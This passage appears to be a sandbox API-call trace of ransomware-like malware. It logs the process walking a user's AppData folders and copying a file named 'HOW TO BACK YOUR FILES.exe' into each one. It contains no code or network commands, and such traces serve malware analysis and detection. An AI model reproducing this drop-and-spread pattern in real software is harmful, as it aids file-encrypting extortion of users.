hHeap=0x2b0000) returned 1 [0106.645] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned 114 [0106.645] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" [0106.645] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.645] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.645] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.646] GetLastError () returned 0x0 [0106.646] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.646] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.646] CloseHandle (hObject=0x120) returned 1 [0106.646] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.646] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.646] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7103a280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x7103a280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.646] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.646] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.646] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache" [0106.646] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0106.646] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0106.646] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache") returned 120 [0106.647] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache" [0106.647] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.647] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.647] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.648] GetLastError () returned 0x0 [0106.648] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.648] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.648] CloseHandle (hObject=0x120) returned 1 [0106.648] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.648] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.648] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x710603e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x710603e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.648] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.648] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.648] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe" [0106.648] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8890 | out: hHeap=0x2b0000) returned 1 [0106.648] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0106.648] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe") returned 84 [0106.648] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe" [0106.648] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.648] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\adobe\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.649] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.649] GetLastError () returned 0x0 [0106.649] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.649] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.649] CloseHandle (hObject=0x120) returned 1 [0106.649] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.649] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.650] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4febe4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.650] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.650] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.650] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Color", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Color") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Color" [0106.650] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2fc8 | out: hHeap=0x2b0000) returned 1 [0106.650] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0106.650] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Color") returned 90 [0106.650] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Color" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Color") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Color" [0106.650] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.650] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Color\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\adobe\\color\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.651] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.651] GetLastError () returned 0x0 [0106.651] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.651] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.651] CloseHandle (hObject=0x120) returned 1 [0106.651] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.651] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.651] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Color\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x70bc3940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x70bc3940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.651] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.651] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.652] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Color\\Profiles", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Color\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Color\\Profiles" [0106.652] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0106.652] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0106.652] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Color\\Profiles") returned 99 [0106.652] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Color\\Profiles" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Color\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Color\\Profiles" [0106.652] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.652] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Color\\Profiles\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\adobe\\color\\profiles\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.653] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.653] GetLastError () returned 0x0 [0106.653] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.653] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.653] CloseHandle (hObject=0x120) returned 1 [0106.653] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.653] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.653] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Color\\Profiles\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xce4463a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x70cce2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x70cce2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.653] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.653] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.653] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Acrobat", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Acrobat" [0106.653] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0106.653] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0106.653] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Acrobat") returned 92 [0106.654] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Acrobat" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Acrobat" [0106.654] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.654] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Acrobat\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\adobe\\acrobat\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.654] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.655] GetLastError () returned 0x0 [0106.655] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.655] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.655] CloseHandle (hObject=0x120) returned 1 [0106.655] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.655] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.655] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Acrobat\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4febe4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.655] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.655] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.655] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" [0106.655] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0106.655] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0106.655] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned 97 [0106.655] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" [0106.655] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.655] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\adobe\\acrobat\\10.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.656] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.656] GetLastError () returned 0x0 [0106.656] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.656] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.656] CloseHandle (hObject=0x120) returned 1 [0106.656] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.656] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.657] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7103a280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x7103a280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.657] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.657] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.657] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache" [0106.657] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d40a8 | out: hHeap=0x2b0000) returned 1 [0106.657] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0106.657] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache") returned 103 [0106.657] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache" [0106.657] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.657] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache\\HOW TO 